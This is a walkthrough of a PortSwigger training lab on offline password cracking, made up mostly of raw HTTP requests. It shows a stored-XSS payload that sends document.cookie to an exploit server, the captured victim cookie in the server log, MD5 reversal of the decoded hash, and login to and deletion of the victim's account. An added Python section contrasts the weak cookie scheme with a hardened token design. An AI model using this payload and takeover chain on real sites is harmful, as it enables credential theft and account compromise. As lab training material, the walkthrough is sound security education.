PortSwigger: Offline password cracking

Solution

Log in to the website as user wiener:

L: wiener
P: peter

The password is stored in the stay-logged-in cookie: stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw

---
POST /login HTTP/2
Host: 0a07008a03a3d9308047993700a5001d.web-security-academy.net
Cookie: session=S0F4JEYb8PztslLuxQoEo0bZz43W20O0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: https://0a07008a03a3d9308047993700a5001d.web-security-academy.net
Referer: https://0a07008a03a3d9308047993700a5001d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter&stay-logged-in=on
---
GET /my-account?id=wiener HTTP/2
Host: 0a07008a03a3d9308047993700a5001d.web-security-academy.net
Cookie: session=vS01EdIJ79CXa1lESH74qYkjnTzPcVBO; stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a07008a03a3d9308047993700a5001d.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
Cookie --> d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
Decoded cookie --> wiener:51dc30ddc473d43a6011e9ebba6ca770
MD5 reverse: 51dc30ddc473d43a6011e9ebba6ca770 --> peter
https://hackerdna.com/tools/md5/51dc30ddc473d43a6011e9ebba6ca770

Payload: <script>document.location='https://exploit-0ac200840356139181bcb0a3018f0095.exploit-server.net/exploit/'+document.cookie</script>
---
Open the exploit server access log: https://exploit-0ac200840356139181bcb0a3018f0095.exploit-server.net/log

93.157.114.80   2025-09-19 11:33:03 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:33:03 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
10.0.3.19       2025-09-19 11:34:23 +0000 "GET /exploit/secret=2teEjyjISQrDTHdNgD1gsFZMpt4pQYPV;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.157.114.80   2025-09-19 11:34:30 +0000 "GET /exploit/ HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:34:39 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:34:39 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
93.157.114.80   2025-09-19 11:34:44 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

Cookie --> Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
Decoded cookie --> carlos:26323c16d5f4dabff3bb136f2460a943
MD5 reverse: 26323c16d5f4dabff3bb136f2460a943 --> onceuponatime
https://md5.gromweb.com/?md5=26323c16d5f4dabff3bb136f2460a943
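
Added example, not part of the original write-up or the lab's code: both decoded cookies above follow the scheme base64(username:md5(password)), so the cookie itself hands out an unsalted password hash. The Python below rebuilds that scheme next to a hardened remember-me token; RememberMeStore and its method names are assumptions made for illustration.

```python
from __future__ import annotations

import base64
import hashlib
import secrets


def weak_cookie(username: str, password: str) -> str:
    """Scheme observed in this lab: base64(username:md5(password))."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()


def decode_weak_cookie(cookie: str) -> tuple[str, str]:
    """Base64 is encoding, not encryption: any holder reads the user and the hash."""
    username, digest = base64.b64decode(cookie).decode().split(":", 1)
    return username, digest


class RememberMeStore:
    """Hardened form (assumed design): random token, only its SHA-256 kept server-side."""

    def __init__(self) -> None:
        self._tokens: dict[str, str] = {}  # sha256(token) -> username

    def issue(self, username: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 random bits, unrelated to the password
        self._tokens[hashlib.sha256(token.encode()).hexdigest()] = username
        return token

    def redeem(self, token: str) -> str | None:
        """Single use: a valid token is consumed; the caller then issues a fresh one."""
        return self._tokens.pop(hashlib.sha256(token.encode()).hexdigest(), None)

    def revoke_all(self, username: str) -> None:
        """Call on password change so old cookies stop working."""
        self._tokens = {h: u for h, u in self._tokens.items() if u != username}


if __name__ == "__main__":
    # Cookie value copied from the page above.
    page_cookie = "d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw"
    print(decode_weak_cookie(page_cookie))
    store = RememberMeStore()
    token = store.issue("wiener")
    print(store.redeem(token), store.redeem(token))  # second redeem fails
```

A stolen hardened token still grants one session until it is redeemed or revoked, but it reveals nothing about the password, so setting HttpOnly on the cookie remains necessary to keep script from reading it.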

Log in to the website and delete the account

POST /login HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=wnFbgp7gYJZP2kohWMLHZeolYJs3VDg4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=carlos&password=onceuponatime
---
GET /my-account?id=carlos HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=s0x29mXfZpSsUdf8AoMFr4iYK30uLph7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/my-account?id=carlos
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /my-account/delete HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=s0x29mXfZpSsUdf8AoMFr4iYK30uLph7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/my-account?id=carlos
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /my-account/delete HTTP/2
Host: 0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Cookie: session=s0x29mXfZpSsUdf8AoMFr4iYK30uLph7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net
Referer: https://0a1f00bf037f7068806fb28a0015009c.web-security-academy.net/my-account/delete
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

password=onceuponatime

Solved